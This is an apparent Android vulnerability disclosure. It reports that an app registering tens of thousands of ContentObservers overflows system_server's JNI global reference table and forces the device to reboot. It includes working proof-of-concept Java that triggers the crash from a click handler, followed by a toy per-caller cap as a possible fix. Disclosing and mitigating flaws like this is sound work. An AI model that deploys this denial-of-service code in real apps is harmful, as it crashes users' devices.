Demo address:
https://github.com/SundayCool/JNIoverflow
https://issuetracker.google.com/issues/117744552
When malicious code in an app registers too many ContentObservers, system_server creates a large number of BinderProxy objects and JNI global reference objects. This overflows the JNI global reference table and makes the system reboot.
As in the code below, when the onClick method at Line 32 is called, the system reboots with a JNI error.
The log and demo code are attached.
```java
 1 public class MainActivity extends ActionBarActivity
 2         implements OnClickListener {
 3
 4     class SettingsObserver extends ContentObserver {
 5         SettingsObserver(Handler handler) {
 6             super(handler);
 7         }
 8
 9         void observe() {
10             ContentResolver resolver = getContentResolver();
11             resolver.registerContentObserver(
12                     Settings.System.getUriFor(Settings.System.ALARM_ALERT), false, this);
13
14             updateSettings();
15         }
16         @Override
17         public void onChange(boolean selfChange) {
18             updateSettings();
19         }
20
21         @Override
22         protected void finalize() throws Throwable {
23             getContentResolver().unregisterContentObserver(this);
24             // TODO Auto-generated method stub
25             super.finalize();
26         }
27     }
28
29     public void updateSettings() {
30     }
31
32     public void onClick(View src)
33     {
34         try {
35             new Thread() {
36                 @Override
37                 public void run() {
38                     for (int i = 0; i < 25600; i++) {  // each registration holds a proxy in system_server
39                         SettingsObserver observer = new SettingsObserver(null);
40                         observer.observe();
41                     }
42                 }
43             }.start();
44
45         } catch (Exception e) {
46             // TODO: handle exception
47         }
48
49
50     }
51 }
```
When malicious code in an application registers too many ContentObservers, system_server creates a large number of BinderProxy objects and JNI global reference objects, causing the JNI global reference table to overflow and ultimately forcing a system reboot. This issue is triggered under specific conditions; the detailed code and log are attached.
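The root cause above is that the system side accepts an unbounded number of registrations from one caller, each pinning a Binder proxy and a JNI global reference. The following is an added illustration, not code from the demo or from Android's ContentService: a toy registry that caps registrations per calling uid and drops them all when the caller dies. The interface `Observer`, the uid `10042` and the limit `MAX_PER_CALLER` are constructed for this example.

```java
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.Set;

/**
 * Toy model of a system-side observer registry with a per-caller cap.
 * Constructed example: not Android's ContentService, and no real Binder objects.
 * MAX_PER_CALLER is a hypothetical value chosen only to show the mechanism.
 */
public class CappedObserverRegistry {
    static final int MAX_PER_CALLER = 16; // hypothetical per-uid limit

    // Stand-in for the observer proxy a caller hands to the system process.
    interface Observer { void onChange(boolean selfChange); }

    private final Map<Integer, Set<Observer>> byUid = new HashMap<>();

    /** Returns false and registers nothing once the caller is at its cap. */
    public synchronized boolean register(int callingUid, Observer o) {
        Set<Observer> mine = byUid.computeIfAbsent(callingUid, k -> new HashSet<>());
        if (mine.contains(o)) return true;               // idempotent re-registration
        if (mine.size() >= MAX_PER_CALLER) return false; // refuse: each proxy would pin a global ref
        mine.add(o);
        return true;
    }

    public synchronized void unregister(int callingUid, Observer o) {
        Set<Observer> mine = byUid.get(callingUid);
        if (mine != null) mine.remove(o);
    }

    /** Called when the caller's process dies (Binder death notification in the real system). */
    public synchronized void onCallerDied(int callingUid) { byUid.remove(callingUid); }

    public synchronized int count(int callingUid) {
        Set<Observer> mine = byUid.get(callingUid);
        return mine == null ? 0 : mine.size();
    }

    public static void main(String[] args) {
        CappedObserverRegistry reg = new CappedObserverRegistry();
        int accepted = 0;
        for (int i = 0; i < 1000; i++) {            // a caller looping like the demo's onClick
            if (reg.register(10042, selfChange -> {})) accepted++;
        }
        System.out.println("accepted=" + accepted + " held=" + reg.count(10042));
        reg.onCallerDied(10042);                    // death cleanup releases everything the caller held
        System.out.println("after death held=" + reg.count(10042));
    }
}
```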